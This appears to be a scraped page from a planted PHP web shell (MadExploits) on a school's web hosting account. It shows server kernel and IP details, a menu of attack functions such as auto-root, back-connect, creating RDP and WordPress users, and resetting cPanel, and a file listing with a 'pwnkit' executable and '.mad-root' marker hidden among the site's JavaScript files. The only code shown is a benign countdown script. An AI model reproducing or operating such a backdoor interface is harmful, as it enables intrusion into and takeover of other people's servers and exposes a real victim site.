Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.12.146.108
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
nbspublicschool /
public_html /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
slider
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
countdown.js
2.33
KB
-rw-r--r--
counter.plugin.js
919
B
-rw-r--r--
css.php
146
B
-rw-r--r--
custom.js
3.96
KB
-rw-r--r--
imagelightbox.min.js
4.6
KB
-rw-r--r--
isotope-docs.min.js
79.73
KB
-rw-r--r--
jquery.bxslider.min.js
18.91
KB
-rw-r--r--
jquery.flexslider-min.js
21.82
KB
-rw-r--r--
jquery.js
93.63
KB
-rw-r--r--
jquery.nicescroll.min.js
59.12
KB
-rw-r--r--
light_box_img.js
751
B
-rw-r--r--
menu.responsive.js
693
B
-rw-r--r--
modernizr.js
14.89
KB
-rw-r--r--
parallax.materialize.js
126.33
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
scroll.menu.js
1.46
KB
-rw-r--r--
slick.min.js
39.51
KB
-rw-r--r--
smk-accordion.js
3.24
KB
-rw-r--r--
sticky.menu.js
12.39
KB
-rw-r--r--
uikit.min.js
52.85
KB
-rw-r--r--
video.lightning.js
9.15
KB
-rw-r--r--
waypoints.min.js
7.86
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : countdown.js
(function($) { $.fn.countdown = function(options, callback) { //custom 'this' selector thisEl = $(this); //array of custom settings var settings = { 'date': null, 'format': null }; //append the settings array to options if(options) { $.extend(settings, options); } //main countdown function function countdown_proc() { eventDate = Date.parse(settings['date']) / 1000; currentDate = Math.floor($.now() / 1000); if(eventDate <= currentDate) { callback.call(this); clearInterval(interval); } seconds = eventDate - currentDate; days = Math.floor(seconds / (60 * 60 * 24)); //calculate the number of days seconds -= days * 60 * 60 * 24; //update the seconds variable with no. of days removed hours = Math.floor(seconds / (60 * 60)); seconds -= hours * 60 * 60; //update the seconds variable with no. of hours removed minutes = Math.floor(seconds / 60); seconds -= minutes * 60; //update the seconds variable with no. of minutes removed //conditional Ss if (days == 1) { thisEl.find(".timeRefDays").text("day"); } else { thisEl.find(".timeRefDays").text("days"); } if (hours == 1) { thisEl.find(".timeRefHours").text("hour"); } else { thisEl.find(".timeRefHours").text("hours"); } if (minutes == 1) { thisEl.find(".timeRefMinutes").text("minute"); } else { thisEl.find(".timeRefMinutes").text("minutes"); } if (seconds == 1) { thisEl.find(".timeRefSeconds").text("second"); } else { thisEl.find(".timeRefSeconds").text("seconds"); } //logic for the two_digits ON setting if(settings['format'] == "on") { days = (String(days).length >= 2) ? days : "0" + days; hours = (String(hours).length >= 2) ? hours : "0" + hours; minutes = (String(minutes).length >= 2) ? minutes : "0" + minutes; seconds = (String(seconds).length >= 2) ? seconds : "0" + seconds; } //update the countdown's html values. if(!isNaN(eventDate)) { thisEl.find(".days").text(days); thisEl.find(".hours").text(hours); thisEl.find(".minutes").text(minutes); thisEl.find(".seconds").text(seconds); } else { alert("Invalid date. Here's an example: 12 Tuesday 2012 17:30:00"); clearInterval(interval); } } //run the function countdown_proc(); //loop the function interval = setInterval(countdown_proc, 1000); } }) (jQuery);
Close